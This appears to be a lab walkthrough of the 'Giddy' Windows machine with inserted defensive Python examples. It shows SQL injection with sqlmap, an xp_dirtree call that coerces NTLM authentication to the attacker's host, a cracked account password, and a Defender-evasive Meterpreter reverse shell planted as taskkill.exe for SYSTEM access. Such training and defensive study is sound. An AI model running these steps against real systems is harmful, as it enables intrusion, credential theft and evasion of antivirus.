
Giddy

Port Scanning

I use RustScan to scan all ports quickly, then nmap to run default scripts and version detection against the open ones. The host exposes a web app (80, 443), RDP (3389), and WinRM (5985).

rustscan -a 10.10.10.104
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Open 10.10.10.104:80
Open 10.10.10.104:443
Open 10.10.10.104:3389
Open 10.10.10.104:5985
nmap -sCV -O -oA GiddyScan -p 80,443,3389,5985 -vvv 10.10.10.104
PORT     STATE SERVICE       REASON          VERSION
80/tcp   open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
443/tcp  open  ssl/http      syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
3389/tcp open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: GIDDY
|   NetBIOS_Domain_Name: GIDDY
|   NetBIOS_Computer_Name: GIDDY
|   DNS_Domain_Name: Giddy
|   DNS_Computer_Name: Giddy
5985/tcp open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found

Running (JUST GUESSING): Microsoft Windows 2016 (89%)
Nmap done: 1 IP address (1 host up) scanned in 29.06 seconds

Web app

The web app's home page shows a dog with a giddy face, so I started a directory brute force.

Found: aspnet_client, remote, mvc

ffuf -w /usr/share/SecLists/Discovery/Web-Content/raft-large-directories.txt -u http://10.10.10.104:80/FUZZ

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

aspnet_client           [Status: 301, Size: 160, Words: 9, Lines: 2, Duration: 88ms]
remote                  [Status: 302, Size: 157, Words: 6, Lines: 4, Duration: 80ms]
Aspnet_client           [Status: 301, Size: 160, Words: 9, Lines: 2, Duration: 82ms]
mvc                     [Status: 301, Size: 150, Words: 9, Lines: 2, Duration: 677ms]
aspnet_Client           [Status: 301, Size: 160, Words: 9, Lines: 2, Duration: 79ms]
Remote                  [Status: 302, Size: 157, Words: 6, Lines: 4, Duration: 80ms]
ASPNET_CLIENT           [Status: 301, Size: 160, Words: 9, Lines: 2, Duration: 80ms]
Aspnet_Client           [Status: 301, Size: 160, Words: 9, Lines: 2, Duration: 92ms]
:: Progress: [62281/62281] :: Job [1/1] :: 49 req/sec :: Duration: [0:02:34] :: Errors: 0 ::
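The ffuf run above reports aspnet_client four times and remote twice, differing only in letter case, because IIS serves paths case-insensitively. The following Python is an added example, not part of the original writeup: it parses ffuf's output lines (the sample is constructed from the results shown above) and collapses case-variant hits, and it pre-filters a wordlist so the variants are never requested in the first place.

```python
"""Added example (not part of the original writeup): parse ffuf output and collapse
hits that differ only in letter case. IIS serves paths case-insensitively, which is
why raft-large-directories.txt turned up four spellings of aspnet_client.
The sample below is constructed from the results shown on this page.
"""
import re
from typing import Dict, List

FFUF_LINE = re.compile(
    r"^(?P<path>\S+)\s+\[Status:\s*(?P<status>\d+),\s*Size:\s*(?P<size>\d+),"
    r"\s*Words:\s*(?P<words>\d+),\s*Lines:\s*(?P<lines>\d+)"
)

SAMPLE_OUTPUT = """\
aspnet_client           [Status: 301, Size: 160, Words: 9, Lines: 2, Duration: 88ms]
remote                  [Status: 302, Size: 157, Words: 6, Lines: 4, Duration: 80ms]
Aspnet_client           [Status: 301, Size: 160, Words: 9, Lines: 2, Duration: 82ms]
mvc                     [Status: 301, Size: 150, Words: 9, Lines: 2, Duration: 677ms]
aspnet_Client           [Status: 301, Size: 160, Words: 9, Lines: 2, Duration: 79ms]
Remote                  [Status: 302, Size: 157, Words: 6, Lines: 4, Duration: 80ms]
ASPNET_CLIENT           [Status: 301, Size: 160, Words: 9, Lines: 2, Duration: 80ms]
Aspnet_Client           [Status: 301, Size: 160, Words: 9, Lines: 2, Duration: 92ms]
:: Progress: [62281/62281] :: Job [1/1] :: 49 req/sec :: Duration: [0:02:34] :: Errors: 0 ::
"""


def parse_ffuf(text: str) -> List[Dict]:
    """Return one dict per result line; banner and progress lines are ignored."""
    hits = []
    for line in text.splitlines():
        m = FFUF_LINE.match(line.strip())
        if m:
            d = m.groupdict()
            hits.append({"path": d["path"], **{k: int(v) for k, v in d.items() if k != "path"}})
    return hits


def dedupe_hits(hits: List[Dict], case_insensitive: bool = True) -> List[Dict]:
    """Keep the first hit per (path, status, size); fold case for case-insensitive servers."""
    seen = set()
    kept = []
    for h in hits:
        key = (h["path"].lower() if case_insensitive else h["path"], h["status"], h["size"])
        if key not in seen:
            seen.add(key)
            kept.append(h)
    return kept


def dedupe_wordlist(words: List[str]) -> List[str]:
    """Drop case variants from a wordlist before fuzzing an IIS target."""
    seen = set()
    out = []
    for w in words:
        if w.lower() not in seen:
            seen.add(w.lower())
            out.append(w)
    return out


if __name__ == "__main__":
    for h in dedupe_hits(parse_ffuf(SAMPLE_OUTPUT)):
        print(f'{h["path"]:<16} {h["status"]} {h["size"]}')
```

On this target the eight hits reduce to three directories (aspnet_client, remote, mvc); pre-filtering the wordlist removes the wasted requests entirely and keeps the server's logs quieter.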

aspnet_client returns 404.

remote doesn't work over HTTP, so I used HTTPS; it is an authenticated PowerShell Web Access portal, so I have to look for credentials.

mvc looks like a web app for an online store.

Create an account

After creating an account, nothing changes.

When you view a product, the web app fetches it by id, so the first idea is to test for SQLi.

The web app is vulnerable to error-based SQL injection (2). The query has 25 columns (3, 4), and the DBMS version can be read (5).

Dumping the database seems like the best option here.
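The root cause of the injection in Product.aspx?ProductSubCategoryId= is a request parameter concatenated into the query text. The Python below is an added example, not code from the writeup or from the target application (whose source is not shown), using sqlite3 in place of ASP.NET and MSSQL with a constructed Product table: the vulnerable lookup beside the parameterized one, exercised with a benign id, a tautology, and a malformed value of the kind sqlmap sends when probing for error-based injection.

```python
"""Added example (not from the Giddy writeup): why a product lookup by id is injectable
when the parameter is concatenated, and how binding the parameter removes the issue.
sqlite3 stands in for MSSQL; the table and rows are constructed.
"""
import sqlite3
from typing import Dict, List


def make_db() -> sqlite3.Connection:
    """Constructed sample data standing in for the 'injection' database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Product (Id INTEGER, ProductSubcategoryId INTEGER, Name TEXT)")
    conn.executemany(
        "INSERT INTO Product VALUES (?, ?, ?)",
        [(1, 26, "Bike Rack"), (2, 26, "Bike Stand"), (3, 27, "Helmet")],
    )
    return conn


def products_vulnerable(conn: sqlite3.Connection, subcategory_id: str) -> List[str]:
    """Concatenates the request parameter into SQL: the defect the writeup exploited."""
    sql = f"SELECT Name FROM Product WHERE ProductSubcategoryId = {subcategory_id}"
    return [row[0] for row in conn.execute(sql)]


def products_parameterized(conn: sqlite3.Connection, subcategory_id: str) -> List[str]:
    """Validates the type the app expects and binds the value; input is never parsed as SQL."""
    try:
        value = int(subcategory_id)
    except ValueError:
        return []  # the app can also answer 400 here; the point is that no SQL is built
    sql = "SELECT Name FROM Product WHERE ProductSubcategoryId = ?"
    return [row[0] for row in conn.execute(sql, (value,))]


def demo() -> Dict[str, object]:
    """Run both lookups against constructed benign and hostile parameter values."""
    conn = make_db()
    benign = "26"
    tautology = "26 OR 1=1"   # widens the result set in the vulnerable version
    malformed = "26'"         # produces a database error the app would echo back
    results: Dict[str, object] = {
        "vuln_benign": products_vulnerable(conn, benign),
        "vuln_tautology": products_vulnerable(conn, tautology),
        "param_benign": products_parameterized(conn, benign),
        "param_tautology": products_parameterized(conn, tautology),
        "param_malformed": products_parameterized(conn, malformed),
    }
    try:
        products_vulnerable(conn, malformed)
        results["vuln_malformed_error"] = None
    except sqlite3.Error as exc:
        # Error text reaching the response is what makes error-based extraction possible.
        results["vuln_malformed_error"] = str(exc)
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The vulnerable lookup returns every product for the tautology and raises a database error for the stray quote; the parameterized version returns nothing unusual for either, and its only behaviour on bad input is an empty result rather than a leaked error message.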

sqlmap -u "http://10.10.10.104/mvc/Product.aspx?ProductSubCategoryId=26" --batch --level=5 --risk=3 --dbs
[09:06:38] [WARNING] reflective value(s) found and filtering out
available databases [5]:
[*] Injection
[*] master
[*] model
[*] msdb
[*] tempdb
sqlmap -u "http://10.10.10.104/mvc/Product.aspx?ProductSubCategoryId=26" --batch --level=5 --risk=3 -D injection --tables
Database: injection
[13 tables]
+-----------------------+
| Applications          |
| CreditCard            |
| Memberships           |
| Product               |
| ProductCategory       |
| ProductSubcategory    |
| Profiles              |
| Roles                 |
| Users                 |
| UsersInRoles          |
| UsersOpenAuthAccounts |
| UsersOpenAuthData     |
| __MigrationHistory    |
+-----------------------+
sqlmap -u "http://10.10.10.104/mvc/Product.aspx?ProductSubCategoryId=26" --batch --level=5 --risk=3 -D injection -T Users --dump
[09:13:15] [WARNING] reflective value(s) found and filtering out
Database: injection
Table: Users
[1 entry]
+--------------------------------------+--------------------------------------+----------+-------------+-------------------------+
| UserId                               | ApplicationId                        | UserName | IsAnonymous | LastActivityDate        |
+--------------------------------------+--------------------------------------+----------+-------------+-------------------------+
| 694AE2D4-BF48-4144-A4B4-6FE59AE8ECD5 | C81A95C0-2420-4091-A662-96DB246A1998 | legend   | NULL        | 2025-06-11T12:56:11.007 |
+--------------------------------------+--------------------------------------+----------+-------------+-------------------------+

It contains only the account I created. sqlmap has an OS takeover function (--os-shell), so why not try it?

sqlmap -u "http://10.10.10.104/mvc/Product.aspx?ProductSubCategoryId=26" --batch --level=5 --risk=3 --os-shell
[09:16:16] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 10 or 2016 or 2022 or 2019 or 11
web application technology: Microsoft IIS 10.0, ASP.NET, ASP.NET 4.0.30319
back-end DBMS: Microsoft SQL Server 2016
[09:16:16] [INFO] testing if current user is DBA
[09:16:16] [WARNING] functionality requested probably does not work because the current session user is not a database administrator. You can try to use option '--dbms-cred' to execute statements as a DBA user if you were able to extract and crack a DBA password by any mean
[09:16:17] [WARNING] reflective value(s) found and filtering out
[09:16:17] [INFO] testing if xp_cmdshell extended procedure is usable
[09:16:18] [WARNING] something went wrong with full UNION technique (could be because of limitation on retrieved number of entries). Falling back to partial UNION technique
[09:16:18] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[09:16:19] [ERROR] unable to retrieve xp_cmdshell output
[09:16:19] [INFO] going to use extended procedure 'xp_cmdshell' for operating system command execution
[09:16:19] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a] Y
[09:16:50] [INFO] retrieved: 0
No output
os-shell> dir
do you want to retrieve the command standard output? [Y/n/a] Y
[09:16:59] [INFO] retrieved: 0
No output

Since that didn't work, we can instead try to capture the MSSQL service account's NetNTLMv2 hash: start Responder, then use xp_dirtree through the injection point to make SQL Server authenticate to our share.

sudo responder -I tun0
18; EXEC master.sys.xp_dirtree '\\10.10.16.7\myshare',1 ,1
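The xp_dirtree call above works because SQL Server resolves the UNC path and authenticates to whatever host it names. The Python below is an added example, not part of the writeup: a small detector that flags statements calling the path-resolving extended procedures with a UNC target outside an allowlist. The log layout, the trusted ranges and the sample lines are all constructed here; in practice the statements would come from SQL Audit or an Extended Events session.

```python
"""Added example (not part of the original writeup): flag SQL Server statements that
make the engine authenticate outbound over SMB, which is how the hash above was captured.
Log format, trusted ranges and sample lines are constructed.
"""
import re
from ipaddress import ip_address, ip_network
from typing import Dict, List, Optional

# Extended procedures that resolve a path, so a UNC argument triggers outbound auth.
UNC_PROC = re.compile(
    r"\b(?:master\.(?:sys\.|dbo\.)?)?xp_(dirtree|fileexist|subdirs)\b", re.IGNORECASE
)
# The host part of a quoted UNC path such as '\\10.10.16.7\myshare'.
UNC_HOST = re.compile(r"""['"]\\\\([^\\'"]+)""")

# Constructed allowlist: where this SQL Server is expected to reach file shares.
TRUSTED_NETS = [ip_network("10.10.10.0/24")]
TRUSTED_SUFFIX = ".giddy.local"  # constructed internal DNS suffix

# Constructed log lines: timestamp|login|client_ip|statement
SAMPLE_LOG = [
    r"2025-06-09T13:40:01|webapp|10.10.10.104|SELECT Name FROM Product WHERE ProductSubCategoryId = 18",
    r"2025-06-09T13:40:02|webapp|10.10.10.104|SELECT Name FROM Product WHERE ProductSubCategoryId = 18; EXEC master.sys.xp_dirtree '\\10.10.16.7\myshare',1 ,1",
    r"2025-06-09T13:41:10|svc_backup|10.10.10.12|EXEC xp_dirtree '\\10.10.10.50\backups',1,1",
    r"2025-06-09T13:42:00|webapp|10.10.10.104|EXEC xp_fileexist '\\files.evil.example\share\x.txt'",
]


def host_is_trusted(host: str) -> bool:
    """IP literals are checked against the allowlisted networks, names by DNS suffix."""
    try:
        return any(ip_address(host) in net for net in TRUSTED_NETS)
    except ValueError:
        return host.lower().endswith(TRUSTED_SUFFIX)


def inspect(line: str) -> Optional[Dict]:
    """Return a finding for a statement calling a path-resolving xp_*, else None."""
    ts, login, client, stmt = line.split("|", 3)
    proc = UNC_PROC.search(stmt)
    if not proc:
        return None
    m = UNC_HOST.search(stmt)
    host = m.group(1) if m else None
    return {
        "time": ts,
        "login": login,
        "client": client,
        "proc": "xp_" + proc.group(1).lower(),
        "target": host,
        "untrusted_target": host is not None and not host_is_trusted(host),
    }


def scan(lines: List[str]) -> List[Dict]:
    """Findings whose UNC target is outside the allowlist; these deserve an alert."""
    return [f for f in (inspect(line) for line in lines) if f and f["untrusted_target"]]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(f'{finding["time"]} {finding["login"]}@{finding["client"]} '
              f'{finding["proc"]} -> {finding["target"]}')
```

Two lines are flagged: the injected xp_dirtree to 10.10.16.7 and an xp_fileexist to an external name, while the backup job's call to an internal share passes. The stronger fixes are to deny EXECUTE on these procedures to the web application's login (a low-privileged login had no reason to reach xp_dirtree here) and to block outbound SMB from the database server, so the coerced authentication never leaves the network.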

Crack the hash with hashcat.

hashcat.exe -m 5600 ntlm.txt rockyou.txt

Dictionary cache hit:
* Filename..: rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384

STACY::GIDDY:47396642dcedd356:2bfe99922bf2d6f03f6760646af97ec4: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:xNnWo6272k7x

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: STACY::GIDDY:47396642dcedd356:2bfe99922bf2d6f03f676...000000
Time.Started.....: Mon Jun 09 16:52:19 2025 (1 sec)
Time.Estimated...: Mon Jun 09 16:52:20 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 14097.2 kH/s (8.02ms) @ Accel:1024 Loops:1 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 3932160/14344384 (27.41%)
Rejected.........: 0/3932160 (0.00%)
Restore.Point....: 1966080/14344384 (13.71%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: brageeny -> seaford123
Hardware.Mon.#1..: Temp: 56c Fan:  0% Util:  6% Core:1950MHz Mem:6801MHz Bus:16

Started: Mon Jun 09 16:52:17 2025
Stopped: Mon Jun 09 16:52:21 2025

Shell as stacy

evil-winrm -i 10.10.10.104 -u stacy -p xNnWo6272k7x
*Evil-WinRM* PS C:\Users\Stacy\Documents> whoami
giddy\stacy

To pick the low-hanging fruit I run winPEAS, though on this box the password-search check took about 15 minutes.

# My machine
wget https://raw.githubusercontent.com/peass-ng/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1
python3 -m http.server 8000

# Giddy Machine
*Evil-WinRM* PS C:\Users\Stacy\Documents> wget http://10.10.16.7:8000/winPEAS.ps1 -o winPEAS.ps1
*Evil-WinRM* PS C:\Users\Stacy\Documents> ls


    Directory: C:\Users\Stacy\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        6/17/2018   9:36 AM              6 unifivideo
-a----         6/9/2025  12:23 PM          81036 winPEAS.ps1


*Evil-WinRM* PS C:\Users\Stacy\Documents> cat unifivideo
stop

*Evil-WinRM* PS C:\Users\Stacy\Documents> Set-ExecutionPolicy Bypass -Scope Process -Force
*Evil-WinRM* PS C:\Users\Stacy\Documents> .\winPEAS.ps1

PowerShell history is worth a look; it can hold credentials.

=========|| PowerShell History (Password Search Only)
=|| PowerShell Console History
=|| To see all history, run this command: Get-Content (Get-PSReadlineOption).HistorySavePath
Cannot find path 'C:\Users\Stacy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ServerRemoteHost_history.txt' because it does not exist.
At C:\users\stacy\downloads\winPEAS.ps1:1386 char:14
+ ... rite-Host $(Get-Content (Get-PSReadLineOption).HistorySavePath | Sele ...
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (C:\Users\Stacy\...ost_history.txt:String) [Get-Content], ItemNotFoundException
    + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetContentCommand

=|| AppData PSReadline Console History
=|| To see all history, run this command: Get-Content C:\Users\Stacy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

=|| PowerShell default transcript history check

There is a service named unifivideoservice; searching for it shows that it belongs to Ubiquiti's UniFi Video software.

*Evil-WinRM* PS C:\Users\Stacy\Documents> Get-Content C:\Users\Stacy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
net stop unifivideoservice
$ExecutionContext.SessionState.LanguageMode
Stop-Service -Name Unifivideoservice -Force
Get-Service -Name Unifivideoservice
whoami
Get-Service -ServiceName UniFiVideoService

Searching for vulnerabilities in UniFi Video turns up a local privilege escalation advisory:

5. VULNERABILITY DETAILS
========================
Ubiquiti UniFi Video for Windows is installed to "C:\ProgramData\unifi-video\"
by default and is also shipped with a service called "Ubiquiti UniFi Video". Its
executable "avService.exe" is placed in the same directory and also runs under
the NT AUTHORITY/SYSTEM account.

However the default permissions on the "C:\ProgramData\unifi-video" folder are
inherited from "C:\ProgramData" and are not explicitly overridden, which allows
all users, even unprivileged ones, to append and write files to the application
directory:

c:\ProgramData>icacls unifi-video
unifi-video NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(F)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(OI)(CI)(RX)
BUILTIN\Users:(I)(CI)(WD,AD,WEA,WA)

Upon start and stop of the service, it tries to load and execute the file at
"C:\ProgramData\unifi-video\taskkill.exe". However this file does not exist in
the application directory by default at all.

By copying an arbitrary "taskkill.exe" to "C:\ProgramData\unifi-video\" as an
unprivileged user, it is therefore possible to escalate privileges and execute
arbitrary code as NT AUTHORITY/SYSTEM.

The folder on Giddy has the same permissions:

*Evil-WinRM* PS C:\Users\Stacy\Documents> cd C:\programdata
*Evil-WinRM* PS C:\programdata> icacls unifi-video
unifi-video NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
            BUILTIN\Administrators:(I)(OI)(CI)(F)
            CREATOR OWNER:(I)(OI)(CI)(IO)(F)
            BUILTIN\Users:(I)(OI)(CI)(RX)
            BUILTIN\Users:(I)(CI)(WD,AD,WEA,WA)

Successfully processed 1 files; Failed processing 0 files
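The weak entry in that listing is BUILTIN\Users:(I)(CI)(WD,AD,WEA,WA): inherited from C:\ProgramData, applied to the folder itself (no IO flag), and granting every local user the right to add files where a SYSTEM service loads an executable from. The Python below is an added example, not code from the writeup or the advisory: it parses icacls output (the sample is the block printed on Giddy, embedded as a constructed string) and flags ACEs that grant write-capable rights to low-privileged well-known principals, which is the check to run across any service's working directory. It assumes the object name on the first line contains no spaces.

```python
"""Added example (not from the writeup or the UniFi advisory): parse `icacls` output
and flag ACEs that let low-privileged principals create or modify files in a directory.
The sample is the icacls output shown on Giddy, embedded here as a constructed string.
"""
import re
from typing import Dict, List

ICACLS_OUTPUT = r"""
unifi-video NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
            BUILTIN\Administrators:(I)(OI)(CI)(F)
            CREATOR OWNER:(I)(OI)(CI)(IO)(F)
            BUILTIN\Users:(I)(OI)(CI)(RX)
            BUILTIN\Users:(I)(CI)(WD,AD,WEA,WA)

Successfully processed 1 files; Failed processing 0 files
"""

# Well-known principals that every local account belongs to.
LOW_PRIV = {
    "builtin\\users",
    "everyone",
    "nt authority\\authenticated users",
    "nt authority\\interactive",
}
INHERIT_FLAGS = {"I", "OI", "CI", "IO", "NP"}
# Simple and specific rights that allow adding or changing files in a folder.
WRITE_RIGHTS = {"F", "M", "W", "D", "WD", "AD", "WA", "WEA", "DC", "GW", "GA"}

ACE = re.compile(r"^(?P<who>[^:]+?):(?P<groups>(?:\([^)]*\))+)\s*$")
FIRST = re.compile(r"^(?P<obj>\S+)\s+(?P<ace>.+)$")  # assumes no spaces in the object name


def parse_icacls(text: str) -> List[Dict]:
    """One dict per ACE with the principal, inheritance flags and rights."""
    aces: List[Dict] = []
    obj = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Successfully processed"):
            continue
        if obj is None:  # the first row carries the object name before its ACE
            m = FIRST.match(line)
            obj, line = m.group("obj"), m.group("ace")
        m = ACE.match(line)
        if not m:
            continue
        groups = re.findall(r"\(([^)]*)\)", m.group("groups"))
        flags = {g for g in groups if g in INHERIT_FLAGS}
        rights = {r.strip() for g in groups if g not in INHERIT_FLAGS for r in g.split(",")}
        aces.append({"object": obj, "who": m.group("who"), "flags": flags, "rights": rights})
    return aces


def weak_aces(text: str) -> List[Dict]:
    """ACEs granting write-capable rights to low-privileged principals."""
    found = []
    for ace in parse_icacls(text):
        writable = ace["rights"] & WRITE_RIGHTS
        if ace["who"].lower() in LOW_PRIV and writable:
            # Without (IO) the ACE applies to the folder itself, so files can be dropped there.
            found.append(dict(ace, writable=writable, applies_to_folder="IO" not in ace["flags"]))
    return found


if __name__ == "__main__":
    for ace in weak_aces(ICACLS_OUTPUT):
        print(f'{ace["object"]}: {ace["who"]} can {sorted(ace["writable"])} '
              f'(applies to folder: {ace["applies_to_folder"]})')
```

On this listing only the second BUILTIN\Users entry is reported; the RX entry is harmless. The remediation is to break inheritance on the folder (icacls /inheritance:d) and remove the BUILTIN\Users write ACE, so that only administrators can add files to a directory from which a SYSTEM service loads executables.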

Now I create a payload to get a reverse shell with administrative privileges.

# my machine
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.16.7 -f exe -o taskkill.exe LPORT=4444

# Giddy
*Evil-WinRM* PS C:\programdata> cd unifi-video
*Evil-WinRM* PS C:\programdata\unifi-video> wget 10.10.16.7:8000/taskkill.exe -o taskkill.exe
*Evil-WinRM* PS C:\programdata\unifi-video> Stop-Service -Name Unifivideoservice -Force
Warning: Waiting for service 'Ubiquiti UniFi Video (Unifivideoservice)' to stop...
Warning: Waiting for service 'Ubiquiti UniFi Video (Unifivideoservice)' to stop...
Warning: Waiting for service 'Ubiquiti UniFi Video (Unifivideoservice)' to stop...
Warning: Waiting for service 'Ubiquiti UniFi Video (Unifivideoservice)' to stop...

The payload doesn't give a shell. Maybe an AV is blocking it?

# Defender Status
*Evil-WinRM* PS C:\programdata\unifi-video> Get-MpComputerStatus
Cannot connect to CIM server. Access denied 
At line:1 char:1
+ Get-MpComputerStatus
+ ~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (MSFT_MpComputerStatus:String) [Get-MpComputerStatus], CimJobException
    + FullyQualifiedErrorId : CimJob_BrokenCimSession,Get-MpComputerStatus
    
# Running Processes for AV Clues
*Evil-WinRM* PS C:\programdata\unifi-video> Get-Process | Where-Object { $_.Name -match "av|defend|sec|symantec|mcafee|carbon|cylance|sentinel|crowd|kaspersky" }

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
   1164      56   341472     196788              2020   0 avService

I found a couple of articles about AV evasion and tried the techniques from 'AV Bypass with Metasploit Templates and Custom Binaries' by Red Team Notes, but they didn't work.

*Evil-WinRM* PS C:\programdata\unifi-video> .\taskkill.exe
Program 'taskkill.exe' failed to run: Operation did not complete successfully because the file contains a virus or potentially unwanted softwareAt line:1 char:1
+ .\taskkill.exe
+ ~~~~~~~~~~~~~~.
At line:1 char:1
+ .\taskkill.exe
+ ~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (:) [], ApplicationFailedException
    + FullyQualifiedErrorId : NativeCommandFailed

Since Metasploit has evasion modules, why not try them?

msf6 > search evasion

Matching Modules
================

   #   Name                                                 Disclosure Date  Rank    Check  Description
   -   ----                                                 ---------------  ----    -----  -----------
   0   evasion/windows/applocker_evasion_install_util       .                normal  No     Applocker Evasion - .NET Framework Installation Utility
   1   evasion/windows/applocker_evasion_msbuild            .                normal  No     Applocker Evasion - MSBuild
   2   evasion/windows/applocker_evasion_regasm_regsvcs     .                normal  No     Applocker Evasion - Microsoft .NET Assembly Registration Utility
   3   evasion/windows/applocker_evasion_workflow_compiler  .                normal  No     Applocker Evasion - Microsoft Workflow Compiler
   4   evasion/windows/applocker_evasion_presentationhost   .                normal  No     Applocker Evasion - Windows Presentation Foundation Host
   5   evasion/windows/syscall_inject                       .                normal  No     Direct windows syscall evasion technique
   6   exploit/unix/webapp/php_eval                         2008-10-13       manual  Yes    Generic PHP Code Evaluation
   7   evasion/windows/windows_defender_exe                 .                normal  No     Microsoft Windows Defender Evasive Executable
   8   evasion/windows/windows_defender_js_hta              .                normal  No     Microsoft Windows Defender Evasive JS.Net and HTA
   9   evasion/windows/process_herpaderping                 .                normal  No     Process Herpaderping evasion technique
   10    \_ target: Microsoft Windows (x64)                 .                .       .      .
   11    \_ target: Microsoft Windows (x86)                 .                .       .      .
   12  post/windows/gather/checkvm                          .                normal  No     Windows Gather Virtual Environment Detection
   
msf6 > use 7

Set everything up

msf6 evasion(windows/windows_defender_exe) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 evasion(windows/windows_defender_exe) > options 

Module options (evasion/windows/windows_defender_exe):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  NnfRT.exe        yes       Filename for the evasive file (default: random)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Evasion target:

   Id  Name
   --  ----
   0   Microsoft Windows



View the full module info with the info, or info -d command.

msf6 evasion(windows/windows_defender_exe) > set lhost tun0
lhost => 10.10.16.7
msf6 evasion(windows/windows_defender_exe) > set lport 8989
lport => 8989
msf6 evasion(windows/windows_defender_exe) > exploit

[*] Compiled executable size: 4096
[+] NnfRT.exe stored at /home/legend/.msf4/local/NnfRT.exe

# Here I copied the payload to the directory I am in and changed its name to taskkill.exe

msf6 evasion(windows/windows_defender_exe) > cp /home/legend/.msf4/local/NnfRT.exe ~/Machines/Giddy/taskkill.exe
[*] exec: cp /home/legend/.msf4/local/NnfRT.exe ~/Machines/Giddy/taskkill.exe

Set up a listener for the payload

msf6 evasion(windows/windows_defender_exe) > use exploit/multi/handler
[*] Using configured payload windows/shell_reverse_tcp

msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > options 

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.16.7       yes       The listen address (an interface may be specified)
   LPORT     8989             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target



View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > run

Start the service again, then transfer the payload and finally stop the service.

*Evil-WinRM* PS C:\programdata\unifi-video> Start-Service -Name Unifivideoservice
Warning: Waiting for service 'Ubiquiti UniFi Video (Unifivideoservice)' to start...
*Evil-WinRM* PS C:\programdata\unifi-video> wget 10.10.16.7:8000/taskkill.exe -o taskkill.exe
*Evil-WinRM* PS C:\programdata\unifi-video> Stop-Service -Name Unifivideoservice -Force
Warning: Waiting for service 'Ubiquiti UniFi Video (Unifivideoservice)' to stop...
Warning: Waiting for service 'Ubiquiti UniFi Video (Unifivideoservice)' to stop...
Warning: Waiting for service 'Ubiquiti UniFi Video (Unifivideoservice)' to stop...
Warning: Waiting for service 'Ubiquiti UniFi Video (Unifivideoservice)' to stop...

Shell as Administrator

[*] Started reverse TCP handler on 10.10.16.7:8989 
[*] Sending stage (177734 bytes) to 10.10.10.104
[*] Meterpreter session 1 opened (10.10.16.7:8989 -> 10.10.10.104:49871) at 2025-06-09 15:16:35 -0400

meterpreter > shell
Process 4628 created.
Channel 1 created.
